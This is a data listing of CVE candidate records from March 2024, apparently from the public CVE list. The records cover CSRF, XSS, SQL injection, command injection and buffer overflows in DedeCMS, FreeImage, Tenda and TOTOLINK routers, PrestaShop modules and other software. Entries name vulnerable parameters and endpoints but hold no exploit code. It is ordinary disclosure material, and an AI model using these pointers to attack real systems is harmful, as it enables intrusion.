CVE    2024    28671    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/stepselect_main.php.    MISC:https://github.com/777erp/cms/blob/main/7.md    Assigned (20240308)
CVE    2024    28670    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_main.php.    MISC:https://github.com/777erp/cms/blob/main/9.md    Assigned (20240308)
CVE    2024    28669    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_edit.php.    MISC:https://github.com/777erp/cms/blob/main/10.md    Assigned (20240308)
CVE    2024    28668    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/mychannel_add.php    MISC:https://github.com/777erp/cms/blob/main/5.md    Assigned (20240308)
CVE    2024    28667    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/templets_one_edit.php    MISC:https://github.com/777erp/cms/blob/main/6.md    Assigned (20240308)
CVE    2024    28666    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/media_add.php    MISC:https://github.com/777erp/cms/blob/main/2.md    Assigned (20240308)
CVE    2024    28665    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_add.php    MISC:https://github.com/777erp/cms/blob/main/1.md    Assigned (20240308)
CVE    2024    28662    Candidate    A Cross Site Scripting vulnerability exists in Piwigo before 14.3.0 script because of missing sanitization in create_tag in admin/include/functions.php.    CONFIRM:https://github.com/Piwigo/Piwigo/compare/14.2.0...14.3.0   |   MISC:https://github.com/Piwigo/Piwigo/commit/5069610aaeb1da6d96d389651a5ba9b38690c580   |   MISC:https://github.com/Piwigo/Piwigo/security/advisories/GHSA-8g2g-6f2c-6h7j    Assigned (20240308)
CVE    2024    2865    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mergen Software Quality Management System allows SQL Injection. This issue affects Quality Management System: through 25032024.    MISC:https://www.usom.gov.tr/bildirim/tr-24-0229   |   URL:https://www.usom.gov.tr/bildirim/tr-24-0229    Assigned (20240325)
CVE    2024    28640    Candidate    Buffer Overflow vulnerability in TOTOLink X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022 allows a remote attacker to cause a denial of service (DoS) via the command field.    MISC:https://github.com/ZIKH26/CVE-information/blob/master/TOTOLINK/Vulnerability%20Information_2.md    Assigned (20240308)
CVE    2024    2864    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaineLabs Youzify - Buddypress Moderation. This issue affects Youzify - Buddypress Moderation: from n/a through 1.2.5.    MISC:https://patchstack.com/database/vulnerability/youzify-moderation/wordpress-youzify-buddypress-moderation-plugin-2-0-0-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/youzify-moderation/wordpress-youzify-buddypress-moderation-plugin-2-0-0-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240325)
CVE    2024    28639    Candidate    Buffer Overflow vulnerability in TOTOLink X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022 allows remote attackers to execute arbitrary code and cause a denial of service (DoS) via the IP field.    MISC:https://github.com/ZIKH26/CVE-information/blob/master/TOTOLINK/Vulnerability%20Information_1.md    Assigned (20240308)
CVE    2024    28635    Candidate    Cross Site Scripting (XSS) vulnerability in SurveyJS Survey Creator v.1.9.132 and before, allows attackers to execute arbitrary code and obtain sensitive information via the title parameter in form.    MISC:https://github.com/surveyjs/survey-creator/issues/5285   |   MISC:https://packetstormsecurity.com/2403-exploits/surveyjssurveycreator19132-xss.txt    Assigned (20240308)
CVE    2024    2863    Candidate    This vulnerability allows remote attackers to traverse paths via file upload on the affected LG LED Assistant.    MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails   |   URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails    Assigned (20240325)
CVE    2024    28623    Candidate    RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section.    MISC:https://github.com/GURJOTEXPERT/ritecms    Assigned (20240308)
CVE    2024    2862    Candidate    This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.    MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails   |   URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails    Assigned (20240325)
CVE    2024    28595    Candidate    SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.    MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md    Assigned (20240308)
CVE    2024    28593    Candidate    ** DISPUTED ** The Chat activity in Moodle 4.3.3 allows students to insert a potentially unwanted HTML A element or IMG element, or HTML content that leads to a performance degradation. NOTE: the vendor's Using_Chat page says "If you know some HTML code, you can use it in your text to do things like insert images, play sounds or create different coloured and sized text." This page also says "Chat is due to be removed from standard Moodle."    MISC:https://docs.moodle.org/403/en/Using_Chat   |   MISC:https://gist.githubusercontent.com/minendie/4f23174687bc4d8eb7f727d9959b5399/raw/9ce573cebcce5521d9d6f826ab68f3780036b874/CVE-2024-28593.txt   |   MISC:https://medium.com/@lamscun/how-do-i-change-htmli-from-low-to-critical-your-email-box-is-safe-e7171efd88fe    Assigned (20240308)
CVE    2024    28584    Candidate    Null Pointer Dereference vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the J2KImageToFIBITMAP() function when reading images in J2K format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28583    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the readLine() function when reading images in XPM format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28582    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the rgbe_RGBEToFloat() function when reading images in HDR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28581    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the _assignPixel<>() function when reading images in TARGA format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28580    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the ReadData() function when reading images in RAS format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28579    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_Unload() function when reading images in HDR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28578    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Load() function when reading images in RAS format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28577    Candidate    Null Pointer Dereference vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the jpeg_read_exif_profile_raw() function when reading images in JPEG format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28576    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_tcp_destroy() function when reading images in J2K format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28575    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_read_mct() function when reading images in J2K format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28574    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_copy_default_tcp_and_create_tcd() function when reading images in J2K format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28573    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the jpeg_read_exif_profile() function when reading images in JPEG format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28572    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_SetTagValue() function when reading images in JPEG format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28571    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the fill_input_buffer() function when reading images in JPEG format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28570    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the processMakerNote() function when reading images in JPEG format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28569    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Imf_2_2::Xdr::read() function when reading images in EXR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28568    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the read_iptc_profile() function when reading images in TIFF format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28567    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_CreateICCProfile() function when reading images in TIFF format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28566    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the AssignPixel() function when reading images in TIFF format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28565    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the psdParser::ReadImageData() function when reading images in PSD format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28564    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the Imf_2_2::CharPtrIO::readChars() function when reading images in EXR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28563    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the Imf_2_2::DwaCompressor::Classifier::Classifier() function when reading images in EXR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28562    Candidate    Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Imf_2_2::copyIntoFrameBuffer() component when reading images in EXR format.    MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909    Assigned (20240308)
CVE    2024    28560    Candidate    SQL injection vulnerability in Niushop B2B2C v.5.3.3 and before allows an attacker to escalate privileges via the deleteArea() function of the Address.php component.    MISC:https://chiggerlor.substack.com/p/cve-2024-28560-cve-2024-28559   |   MISC:https://gitee.com/niushop-team/niushop_b2c_v5   |   MISC:https://v5.niuteam.cn   |   MISC:https://www.niushop.com/    Assigned (20240308)
CVE    2024    2856    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC10 16.03.10.13/16.03.10.20. Affected by this issue is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257780. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:Submit #299741 | Tenda AC10 AC10 v4.0 V16.03.10.13、V16.03.10.20 buffer overflow   |   URL:https://vuldb.com/?submit.299741   |   MISC:VDB-257780 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257780   |   MISC:VDB-257780 | Tenda AC10 SetSysTimeCfg fromSetSysTime stack-based overflow   |   URL:https://vuldb.com/?id.257780   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetSysTime.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetSysTime.md    Assigned (20240323)
CVE    2024    28559    Candidate    SQL injection vulnerability in Niushop B2B2C v.5.3.3 and before allows an attacker to escalate privileges via the setPrice() function of the Goodsbatchset.php component.    MISC:https://chiggerlor.substack.com/p/cve-2024-28560-cve-2024-28559   |   MISC:https://gitee.com/niushop-team/niushop_b2c_v5   |   MISC:https://v5.niuteam.cn   |   MISC:https://v5.niuteam.cn/   |   MISC:https://www.niushop.com/    Assigned (20240308)
CVE    2024    28553    Candidate    Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter of the fromAddressNat function.    MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromAddressNat_entrys.md    Assigned (20240308)
CVE    2024    28550    Candidate    Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the filePath parameter of formExpandDlnaFile function.    MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formExpandDlnaFile.md    Assigned (20240308)
CVE    2024    2855    Candidate    A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.05.19/15.03.20. Affected by this vulnerability is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257779. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257779 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257779   |   MISC:VDB-257779 | Tenda AC15 SetSysTimeCfg fromSetSysTime stack-based overflow   |   URL:https://vuldb.com/?id.257779   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromSetSysTime.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromSetSysTime.md    Assigned (20240323)
CVE    2024    28547    Candidate    Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the firewallEn parameter of formSetFirewallCfg function.    MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetFirewallCfg.md    Assigned (20240308)
CVE    2024    2854    Candidate    A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257778 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257778   |   MISC:VDB-257778 | Tenda AC18 setsambacfg formSetSambaConf os command injection   |   URL:https://vuldb.com/?id.257778   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetSambaConf.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetSambaConf.md    Assigned (20240323)
CVE    2024    28537    Candidate    Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the page parameter of fromNatStaticSetting function.    MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromNatStaticSetting.md    Assigned (20240308)
CVE    2024    28535    Candidate    Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the mitInterface parameter of fromAddressNat function.    MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromAddressNat_mitInterface.md    Assigned (20240308)
CVE    2024    2853    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.48/15.03.06.49. It has been rated as critical. This issue affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257777 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257777   |   MISC:VDB-257777 | Tenda AC10U setsambacfg formSetSambaConf os command injection   |   URL:https://vuldb.com/?id.257777   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetSambaConf.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetSambaConf.md    Assigned (20240323)
CVE    2024    28521    Candidate    SQL Injection vulnerability in Netcome NS-ASG Application Security Gateway v.6.3.1 allows a local attacker to execute arbitrary code and obtain sensitive information via a crafted script to the loginid parameter of the /singlelogin.php component.    MISC:https://github.com/aknbg1thub/cve/blob/main/sql.md    Assigned (20240308)
CVE    2024    2852    Candidate    A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257776. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257776 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257776   |   MISC:VDB-257776 | Tenda AC15 saveParentControlInfo stack-based overflow   |   URL:https://vuldb.com/?id.257776   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/saveParentControlInfo_urls.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/saveParentControlInfo_urls.md    Assigned (20240323)
CVE    2024    2851    Candidate    A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257775 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257775   |   MISC:VDB-257775 | Tenda AC15 setsambacfg formSetSambaConf os command injection   |   URL:https://vuldb.com/?id.257775   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/formSetSambaConf.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/formSetSambaConf.md    Assigned (20240323)
CVE    2024    2850    Candidate    A vulnerability was found in Tenda AC15 15.03.05.18 and classified as critical. Affected by this issue is the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257774 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257774   |   MISC:VDB-257774 | Tenda AC15 saveParentControlInfo stack-based overflow   |   URL:https://vuldb.com/?id.257774   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/saveParentControlInfo_urls.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/saveParentControlInfo_urls.md    Assigned (20240323)
CVE    2024    2849    Candidate    A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability.    MISC:Submit #303123 | Sourcecodester Simple File Manager Web App using PHP and MySQL Database Free Source Code v1.0 unrestricted uploads   |   URL:https://vuldb.com/?submit.303123   |   MISC:VDB-257770 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257770   |   MISC:VDB-257770 | SourceCodester Simple File Manager unrestricted upload   |   URL:https://vuldb.com/?id.257770   |   MISC:https://github.com/CveSecLook/cve/issues/1   |   URL:https://github.com/CveSecLook/cve/issues/1    Assigned (20240322)
CVE    2024    28447    Candidate    Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_ipaddr parameters at /apply.cgi.    MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini.md    Assigned (20240308)
CVE    2024    28446    Candidate    Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_netmask parameter at /apply.cgi.    MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini.md    Assigned (20240308)
CVE    2024    28441    Candidate    File Upload vulnerability in magicflue v.7.0 and before allows a remote attacker to execute arbitrary code via a crafted request to the messageid parameter of the mail/mailupdate.jsp endpoint.    MISC:https://github.com/iamHuFei/HVVault/blob/main/webapp/%E9%AD%94%E6%96%B9%E7%BD%91%E8%A1%A8/magicflu-mailupdate-jsp-fileupload.md    Assigned (20240308)
CVE    2024    28435    Candidate    The CRM platform Twenty version 0.3.0 is vulnerable to SSRF via file upload.    MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-28435   |   MISC:https://github.com/twentyhq/twenty    Assigned (20240308)
CVE    2024    28434    Candidate    The CRM platform Twenty is vulnerable to stored cross site scripting via file upload in version 0.3.0. A crafted svg file can trigger the execution of the javascript code.    MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-28434   |   MISC:https://github.com/twentyhq/twenty    Assigned (20240308)
CVE    2024    28432    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_edit.php.    MISC:https://github.com/itsqian797/cms/blob/main/4.md    Assigned (20240308)
CVE    2024    28431    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_del.php.    MISC:https://github.com/itsqian797/cms/blob/main/3.md    Assigned (20240308)
CVE    2024    28430    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_edit.php.    MISC:https://github.com/itsqian797/cms/blob/main/1.md    Assigned (20240308)
CVE    2024    28429    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php.    MISC:https://github.com/itsqian797/cms/blob/main/2.md    Assigned (20240308)
CVE    2024    28425    Candidate    greykite v1.0.0 was discovered to contain an arbitrary file upload vulnerability in the load_obj function at /templates/pickle_utils.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted file.    MISC:https://github.com/bayuncao/vul-cve-17    Assigned (20240308)
CVE    2024    28424    Candidate    zenml v0.55.4 was discovered to contain an arbitrary file upload vulnerability in the load function at /materializers/cloudpickle_materializer.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted file.    MISC:https://github.com/bayuncao/vul-cve-18    Assigned (20240308)
CVE    2024    28423    Candidate    Airflow-Diagrams v2.1.0 was discovered to contain an arbitrary file upload vulnerability in the unsafe_load function at cli.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted YML file.    MISC:https://github.com/bayuncao/vul-cve-15    Assigned (20240308)
CVE    2024    28421    Candidate    SQL Injection vulnerability in Razor 0.8.0 allows a remote attacker to escalate privileges via the ChannelModel::updateapk method of the channelmodle.php    MISC:https://gist.github.com/LioTree/003202727a61c0fb3ec3c948ab5e38f9   |   MISC:https://github.com/cobub/razor/issues/178    Assigned (20240308)
CVE    2024    28418    Candidate    Webedition CMS 9.2.2.0 has a File upload vulnerability via /webEdition/we_cmd.php    MISC:https://gitee.com/shavchen214/pwn/issues/I94VI3    Assigned (20240308)
CVE    2024    28417    Candidate    Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php.    MISC:https://gitee.com/shavchen214/pwn/issues/I94VFH    Assigned (20240308)
CVE    2024    28404    Candidate    TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in MAC Filtering under the Firewall Page.    MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_3_MAC_Filtering/XSS.md   |   MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html    Assigned (20240308)
CVE    2024    28403    Candidate    TOTOLINK X2000R before V1.0.0-B20231213.1013 is vulnerable to Cross Site Scripting (XSS) via the VPN Page.    MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_5_VPN/XSS.md   |   MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html    Assigned (20240308)
CVE    2024    28402    Candidate    TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in IP/Port Filtering under the Firewall Page.    MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_4_IP_Port_Filtering/XSS.md   |   MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html    Assigned (20240308)
CVE    2024    28401    Candidate    TOTOLINK X2000R before v1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in Root Access Control under the Wireless Page.    MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_1_Root_Access_Control/XSS.md   |   MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html    Assigned (20240308)
CVE    2024    28396    Candidate    An issue in MyPrestaModules ordersexport v.6.0.2 and before allows a remote attacker to execute arbitrary code via the download.php component.    MISC:https://addons.prestashop.com/en/data-import-export/17596-orders-csv-excel-export-pro.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/14/ordersexport.html    Assigned (20240308)
CVE    2024    28395    Candidate    SQL injection vulnerability in Best-Kit bestkit_popup v.1.7.2 and before allows a remote attacker to escalate privileges via the bestkit_popup.php component.    MISC:https://addons.prestashop.com/en/pop-up/20208-pop-up-schedule-popup-splash-window.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/14/bestkit_popup.html    Assigned (20240308)
CVE    2024    28394    Candidate    An issue in Advanced Plugins reportsstatistics v1.3.20 and before allows a remote attacker to execute arbitrary code via the Sales Reports, Statistics, Custom Fields & Export module.    MISC:https://addons.prestashop.com/en/customer-administration/28379-sales-reports-statistics-custom-fields-export.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/14/reportsstatistics.html    Assigned (20240308)
CVE    2024    28393    Candidate    SQL injection vulnerability in scalapay v.1.2.41 and before allows a remote attacker to escalate privileges via the ScalapayReturnModuleFrontController::postProcess() method.    MISC:https://addons.prestashop.com/fr/paiement-en-plusieurs-fois/87023-scalapay-payez-en-3-fois-sans-frais.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/19/scalapay.html    Assigned (20240308)
CVE    2024    28392    Candidate    SQL injection vulnerability in pscartabandonmentpro v.2.0.11 and before allows a remote attacker to escalate privileges via the pscartabandonmentproFrontCAPUnsubscribeJobModuleFrontController::setEmailVisualized() method.    MISC:https://addons.prestashop.com/en/remarketing-shopping-cart-abandonment/16535-abandoned-cart-reminder-pro.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/14/pscartabandonmentpro.html    Assigned (20240308)
CVE    2024    28391    Candidate    SQL injection vulnerability in FME Modules quickproducttable module for PrestaShop v.1.2.1 and before, allows a remote attacker to escalate privileges and obtain information via the readCsv(), displayAjaxProductChangeAttr, displayAjaxProductAddToCart, getSearchProducts, and displayAjaxProductSku methods.    MISC:https://security.friendsofpresta.org/modules/2024/03/12/quickproducttable.html    Assigned (20240308)
CVE    2024    28390    Candidate    An issue in Advanced Plugins ultimateimagetool module for PrestaShop before v.2.2.01, allows a remote attacker to escalate privileges and obtain sensitive information via Improper Access Control.    MISC:https://security.friendsofpresta.org/modules/2024/03/12/ultimateimagetool.html    Assigned (20240308)
